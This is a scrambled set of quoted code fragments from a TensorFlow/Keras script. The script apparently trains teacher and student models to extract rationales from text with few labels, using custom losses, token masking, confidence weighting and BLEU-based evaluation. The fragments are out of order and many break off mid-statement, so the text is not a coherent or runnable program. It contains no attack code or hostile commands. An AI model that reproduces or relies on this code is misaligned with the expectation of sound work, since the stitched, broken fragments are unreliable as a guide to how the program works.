[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))])", "attention_mask_r} #mask tokens that are not rationales u-r if '_neg' in type_: X_negation_sample", "max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. 
if", "1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0]", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'],", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_", "= models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss],", "in type_: #re-weight labels X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_:", "type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices],", "score of rationales on test set 
(teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of", "on test set (student model): {} \".format(score4/len(pred))) data = [] for i in", "the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint'", "loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0,", "[y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev,", "X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] =", "temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info", "y to train and dev with valid_split if valid_split > 0: train_size =", "of rationales on test set (student model): {} \".format(score4/len(pred))) data = [] for", "{}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred, truth = [], [] #sys.exit(1) test_pred = y_pred #np.argmax(y_pred,", "\"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size]", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope():", "1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]),", "(student model): {} 
\".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (student model):", "instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred", "\"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_:", "reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob,", "== 'joint': rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else:", "y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for word in temp_p: if word", "in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp", "+= (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall):", "(recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 =", "tp +=ct fn += (y_test[i].sum()-ct) p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn)))))", "X_batch['attention_mask_r'] = 
X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs,", "(\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids':", "file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc,", "np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in", "0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir,", "''' if '_noexp' in type_: loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp'", "X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0],", "range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i,", "if '_r_' in type_: #re-weight rationales X_conf[:,1:] = np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm'", "np.where(log_rationale>0, log_rationale, 0.000000001) if 'norm' in type_: X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf =", "X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 
'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)])", "tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0]", "if '_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} '''", "'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1],", "for i in range(len(cls)): X_conf[i,0] = class_weight[cls[i][0]]*X_conf[i,0] #logger.info (\"Weights {}\".format(X_conf[:10])) logger.info(\"X_connf shape: {}\".format(X_conf.shape))", "= {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if 'joint' in type_: X_rationale_batch =", "y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)", "total loss : {}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred", "''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) '''", "'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), 
tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] =", "101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from teacher model as input for task:", "= os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model =", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0))", "'_neg' in type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices", "pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f)", "= tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0] =", "y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights =", "hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = 
tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None", "confidence on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on", "= y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling", "int((1. - valid_split)*len(X[\"input_ids\"])) if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\":", "X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]},", "patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true, y_pred):", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if", "\"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\":", "average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "task label temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += 
y_test[i].sum() truth_0+= max_seq_length-truth_1", "logger.info(\"Printing prediction data on student model for run {}: {}\".format(counter, test_pred)) tp, fn,", "[],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in range(0,len(test_pred[0])-1): if", "custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r']", "'rationale_classifier':rat_loss, 'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) with strategy.scope(): loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "= model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) #logger.info(\"Micro score (task):", "shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels),", "base model based on validation loss best_base_model = None best_validation_loss = np.inf for", 
"X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample,", "truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as", "epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #", "tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights", "X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint'", "y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test,", "y_neg_dev], verbose=0)[-3] if test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0],", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 
'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': custom_loss_neg}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None},", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce", "sklearn.utils import shuffle from transformers import * import logging import math import models", "= np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if", "X_conf[:,1:] = tf.nn.softmax(X_conf[:,1:], axis=0) #X_conf = np.ones((len(X_batch['input_ids']), max_seq_length)) for i in range(len(cls)): X_conf[i,0]", "# class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_ : y_neg", "Rationale using few-shot learning. 
This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\"", "[] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model", "= val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc =", "probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs =", "np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] # sample from unlabeled", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss", "token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro')))", "test_acc > max_test_acc: max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test],", "#, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5,", "(https://github.com/microsoft/UST) \"\"\" from collections import defaultdict from sklearn.utils import shuffle from transformers import", "logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if", "Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = 
tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run", "n times with different initialization to select best base model based on validation", "X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled,", "if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_: #re-weight", "X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating", "type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "#mask tokens that are not rationales u-r if '_neg' in type_: X_negation_sample =", "y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)),", "fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0,", "i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test", "(teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model):", "model.load_weights(model_file) logger.info (\"Model file loaded from 
{}\".format(model_file)) continue if 'mtl' in type_ :", "{}\".format(counter, task_acc)) if 'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc", "= 0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss =", "X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch,", "custom_loss(y_true, y_pred): logger.info(y_pred) return kb.mean(y_true*y_pred, axis=-1) with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':", "temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for", "T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\",", "for run {}: {}\".format(counter, test_pred)) tp, fn, fp = 0, 0, 0 pred_1,", "{}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc", "in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus,", "'mtl' in type_: #model = model_student logger.info(y_batch.shape) model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev,", "'token_type_ids': 
X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred = {'input_ids':", "tokens that are not rationales u-r if '_neg' in type_: X_negation_sample = {\"input_ids\":", "score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test", "as f: json.dump(data, f) model_student = None # model_task for epoch in range(unsup_epochs):", "out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 =", "0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus,", "1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier':", "acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir,", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, 
epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc", "temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'),", "in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val = np.amax(acc, axis=-1) #y_rat", "np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices]", "score of rationales on test set (student model): {} \".format(score4/len(pred))) data = []", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else: out = model.predict(X_unlabeled_sample,", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev = np.full((len(y_dev),", "os, sys import json import nltk import tensorflow as tf import tensorflow.keras as", "\"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = 
